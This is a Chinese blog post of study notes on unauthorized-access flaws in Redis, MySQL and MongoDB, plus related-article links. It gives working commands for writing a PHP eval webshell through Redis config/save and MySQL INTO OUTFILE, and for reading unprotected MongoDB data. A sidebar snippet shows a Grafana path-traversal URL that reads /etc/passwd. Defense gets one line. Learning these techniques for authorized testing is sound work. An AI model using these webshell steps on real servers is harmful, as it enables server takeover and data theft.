7、未授权访问漏洞

最新推荐文章于 2024-07-17 20:21:22 发布
最新推荐文章于 2024-07-17 20:21:22 发布
阅读量487 收藏 7
点赞数 8
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135461774
版权
本文探讨了Web通用漏洞中的未授权访问问题,包括Redis、MySQL和MongoDB的漏洞利用方法,如写文件、远程连接和爆破口令。同时,强调了对常用端口的测试以及开启身份验证作为漏洞防御手段。
摘要由CSDN通过智能技术生成

1、概述

服务或应用未授权或者鉴权失效导致被恶意攻击,广义上来讲,鉴权绕过也属于未授权访问。

  • 分类:Web通用漏洞
  • 风险等级及危害:
    1. 严重:可完全控制服务器、执行系统命令。
    2. 高危:可获取数据库大量敏感信息或对系统进行控制。
    3. 低危:可登录系统,但无法通过当前权限的操作造成实际危害。

有以下几种:

  1. Redis未授权访问漏洞
  2. Mysql未授权访问漏洞
  3. MongoDB未授权访问漏洞
  4. 。。。

2、漏洞利用

2.1、Redis未授权访问漏洞

开放端口:6379

利用方法:写文件Getshell、获取数据

config get dir #查看redis数据库路径
config set dir /root/redis-2.8.17# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#将一句话木马写入文件中
#"\r\n\r\n"是换行的意思,用redis写入文件会自带一些版本信息,如果不换行可能导致无法执行。
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"#上传木马可以通过蚁剑连接
save

2.2、Mysql未授权访问漏洞

开放端口:3306

利用方法:爆破弱口令、写文件、远程连接获取数据

select'<?php @eval($_POST[1])?>'into outfile '/data/www/1.php'

2.3、MongoDB未授权访问漏洞

开放端口:27017

利用方法:远程连接获取数据

Show dbs //查询所有数据库
Use websec //选择数据库,没有就创建
db.websec.insert({"name":"websec is ez"}) //插入数据
db.websec.find().pretty() //查询所有数据

3、漏洞挖掘

对这几个常用端口进行测试

4、漏洞防御

开启身份验证

DarkByte-
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
业务安全漏洞整理.7z
02-24
7. **合规性问题**:如果业务遵循相关的法规标准,如GDPR(通用数据保护条例)或PCI-DSS(支付卡行业数据安全标准),那么可能会面临法律风险。 解决业务安全漏洞的关键在于全面的威胁建模、严格的代码审查、持续...
授权访问和数据泄露风险
图幻未来的博客
04-29 477
随着网络技术的发展和应用的普及,网络安全问题日益凸显。其中,授权访问和数据泄露成为当前网络安全的重要威胁之一。本文从多个方面分析了授权访问和数据泄露的原因、危害及对策,以期为网络安全领域的研究和实践提供参考。
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3678
该篇记录了web漏洞-授权访问漏洞的相关知识
Web安全基础学习:权限控制漏洞授权访问
qq_51862722的博客
06-18 638
授权访问漏洞:指应用系统对业务功能页面进行有效的身份校验,在登录且获知业务功能页面的访问地址前提下,直接访问授权的页面、目录或资源,获取系统中的敏感信息或进行非法操作。
授权访问漏洞合集
m0_49420271的博客
07-24 1090
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
授权访问漏洞总结
LuckySec
03-24 4828
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
常见授权访问漏洞总结
mingyqf的博客
01-18 3473
常见授权访问漏洞总结 https://xz.aliyun.com/t/6103#toc-12 小维 / 2019-08-28 09:10:00 / 浏览数 46708 安全技术 众测渗透[顶(13)](javascript:) [踩(0)](javascript:) 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS
7、越权漏洞.pdf资料
10-15
这种漏洞允许授权的用户访问或操作他们本不应该能够触及的数据或功能,通常表现为水平越权和垂直越权。 水平越权漏洞主要发生在同一权限等级的用户之间。当系统没有正确地限制用户只能访问自己的数据时,一个...
红帆OA(医疗版)漏洞细节授权SQL注入请求注入数据包
05-06
红帆OA(医疗版)存在授权SQL注入的风险,这可能导致敏感信息泄露或被篡改。 ##### 1. SQL注入示例 以下是一些具体的SQL注入示例: - **找回密码位置的SQL注入**: ```http GET /api/switch-value/list?sorts=...
授权访问漏洞之一
qq_45233918的博客
12-21 2172
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。
常见授权访问漏洞详解
m0_55854679的博客
05-15 3218
参考文章1:二十八种授权访问漏洞合集 参考文章2:28种授权访问漏洞 简介 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 MongoDB 授权访问漏洞 漏洞信息 开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作【增、删、改、查高危动作】而且可以远程访问数据库。 造成授权访问的根本原因就在于启动 Mongodb
Grafana 授权任意文件读取漏洞复现
渗透测试研究中心
12-16 5481
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd 2.获取远程目标linux系统的/etc/passwd密码信息 /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugin
授权访问漏洞汇总
weixin_46137328的博客
09-23 7501
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
浅析SpringBoot框架常见授权访问漏洞
道阻且长,行则将至。
02-23 7835
本文总结学习了 Swagger-UI、SpringBoot Actuator、Druid、Webpack 组件的授权访问漏洞基本原理与漏洞探测方法,在介绍了几款自动化扫描工具的同时,也简要分析了 CVE-2022-22947 Spring Cloud Gateway RCE 漏洞
常见授权访问漏洞
最新发布
weixin_60838266的博客
07-17 853
由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版本包括 5.0 和 5.1 版本(即默认情况下)。
MySQL常见的安全风险有哪些?底层原理是什么?
长风破浪会有时的博客
05-06 440
MySQL 是一种广泛使用的关系型数据库管理系统,由于其开放源代码的特性和普及程度,也成为攻击者攻击的目标之一。攻击者可以使用暴力破解或者字典攻击等方式来猜测密码,从而获得数据库的访问权限。授权访问授权访问是指攻击者利用应用程序中的漏洞或者直接访问数据库,获取数据库的敏感信息或者修改数据等非法操作。数据库拒绝服务攻击:数据库拒绝服务攻击是指攻击者利用大量恶意请求来占用服务器的资源,从而导致正常请求无法处理。数据库暴露:数据库暴露是指数据库服务器正确配置,导致数据库中的敏感信息被攻击者获取。
常见授权访问漏洞修复
qq_41945550的博客
06-02 4635
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
nacos授权访问漏洞 修复
07-15
对于Nacos的授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值